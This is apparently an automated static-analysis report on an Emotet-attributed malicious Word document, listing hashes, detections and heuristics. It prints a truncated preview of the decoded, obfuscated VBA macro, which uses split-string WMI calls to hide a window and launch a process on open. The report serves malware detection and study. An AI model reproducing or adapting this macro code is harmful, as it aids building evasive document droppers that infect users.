Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 9d033f107916ce5c…

MALICIOUS

Office (OLE)

294.6 KB Created: 2019-02-18 14:23:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 415f314e52b787f5e1cb4e87a1845a2b SHA-1: 7976113c9c99cc7415326725c69f67d56a61d895 SHA-256: 9d033f107916ce5c4e015751cf2d2fcdcc8e73a02fad98607b21f1fbc1cf1591
342 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1218.011 System Binary Proxy Execution: Rundll32

This document contains VBA macros that are automatically executed upon opening, indicated by the 'autoopen' marker. The macros utilize GetObject and CreateObject to interact with WMI (winmgmts) to launch a process, a common technique for executing malicious payloads. The ClamAV detection explicitly names Emotet, and the heuristic firings strongly support this attribution.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-6861363-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6861363-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 55613 bytes
SHA-256: 79f2a5b8c43300415b9c4bf74b7ac34409f78159563a33e7e05b6d7b0a08b5f2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "K_2_08"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "j4_295"
Function c8_5___3()
   If m39_98 <> Y3608_3 Then
      N686_94 = (658516667)
    Q9578_ = N_2825_ * 272507174 + D_2_4_0 + CLng(s1863_5)
G__092_1 = 358471837 / Hex(L075_9 / Chr(a68_29 - CDate(67459892)) * 592815160 / 700531426) / n_913876 - Fix(155593584)
K7_33393 = (529766171)
End If
   If L72_908 <> C__3__5_ Then
      p_81_4 = (874443169)
    I__50_71 = j_______ * 348623678 + B577290 + CLng(h_6_8_)
G670_24 = 403778558 / Hex(k2_789 / Chr(Z8_94_ - CDate(619948513)) * 174153339 / 68311320) / G6__60_ - Fix(231617716)
L4149_ = (360189174)
End If
   If N717733 <> f__478 Then
      Q139_8 = (228320419)
    d_528__ = F31___ * 491784028 + u2063593 + CLng(A7__7_)
k211__7 = 448827374 / Hex(b2620_ / Chr(w3917610 - CDate(287431539)) * 532469439 / 156398516) / z66__0_ - Fix(129953381)
m480_0__ = (132284882)
End If
   If I5_37__ <> j4394_ Then
      l_9_140 = (883022150)
    D37_3695 = v6__715_ * 268924217 + U____992 + CLng(R_1_00)
o1__3_ = 353985243 / Hex(R___96_ / Chr(h16_14_ - CDate(450630859)) * 589039480 / 612189825) / n6_075 - Fix(993251557)
D9__422 = (414759823)
End If
   If q_9__6 <> N_97_4 Then
      I8_457 = (323547084)
    G4_91_2 = t4_137__ * 177663503 + h676__6 + CLng(p689593)
L_7__6_ = 609085526 / Hex(Z89400_ / Chr(T_474218 - CDate(706887094)) * 104373762 / 720881727) / J3___0 - Fix(481731504)
I016_42 = (884549480)
End If
   If L19_4_ <> V8276613 Then
      w58280 = (493945827)
    K59__9 = P23_8874 * 262887079 + o451_3_7 + CLng(c_48_4)
k2_97_12 = 538075221 / Hex(D_42____ / Chr(k235__3_ - CDate(264449403)) * 584631794 / 293154094) / d7_3_8_ - Fix(855862730)
i645_79 = (135304728)
End If
End Function
Function G350136(O_7470, z_049_)
On Error Resume Next
   If N5821176 <> H3880__ Then
      c9_7__4_ = (331232068)
    n2_646 = o09054 * 153274469 + v603_66 + CLng(s_5_53)
m15344_0 = 401878824 / Hex(v04030__ / Chr(q071_87_ - CDate(22011249)) * 376685950 / 429566967) / Y25693_ - Fix(470913325)
W709231 = (417588160)
End If
   If J8_28926 <> O9_7_1_0 Then
      R56___ = (269773209)
    A11_678 = C082__ * 696732665 + d425312 + CLng(J_5_55__)
m6_61_ = 659544174 / Hex(M693150 / Chr(k___196 - CDate(99869548)) * 771307238 / 249053002) / M__612 - Fix(610167845)
Z72827 = (583516965)
End If
Set U807_65 = GetObject("winmgm" + "ts:Win" + "32_Proce" + "ssStartup")
   If C029__ <> i31738 Then
      m2508_5 = (378174955)
    A2047_ = O4_358 * 459363117 + C___92_ + CLng(p19350_9)
f5_2214 = 791777082 / Hex(m_4_757 / Chr(W1__725 - CDate(485025353)) * 56226227 / 891858061) / m9_115 - Fix(804506476)
P54_31__ = (731566215)
End If
   If X1___605 <> L_7__5 Then
      G82702_7 = (215563413)
    X6__8_4_ = m28159__ * 775396548 + i087__ + CLng(I73_99_)
z2095_67 = 584013639 / Hex(b_9779 / Chr(U5___285 - CDate(546537556)) * 182900643 / 929628651) / P__0985 - Fix(755510670)
J8223__6 = (25532724)
End If
   If j50_26 <> C8_77_ Then
      S1___1 = (625120367)
    X356_3_3 = s17_0214 * 181012068 + o12298 + CLng(R909393)
M5_5512_ = 868914718 / Hex(r__740 / Chr(L530__ - CDate(850333861)) * 161519900 / 161283464) / F715__ - Fix(935657431)
A12_4_9 = (574865834)
End If
U807_65.ShowWindow = 680941 - 680941
   If C9105_ <> w_4__18 Then
      z10___3 = (419013575)
    l6232_ = R1__8__1 * 840030804 + I5320_ + CLng(O2__44)
L__32_43 = 346899847 / Hex(Z_3_17 / Chr(z846307_ - CDate(704508968)) * 611833071 / 200329064) / C293184 - Fix(324876611)
o___6240 = (325223584)
End If
   If X14_861 <> f5___1 Then
      L552_8_4 = (385787104)
    J736_540 = E_8065 * 982598202 + m8371857 + CLng(O93528_)
z7066027 = 780189698 / Hex(L198571 / Chr(s9_92_ - CDate(679105277)) * 940439478 / 500500231) / f__962 - Fix(155949449)
v181254_ = (647020961)
End If
GetObject("winmg" + "mts:Wi" + "n32_Process").Crea
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.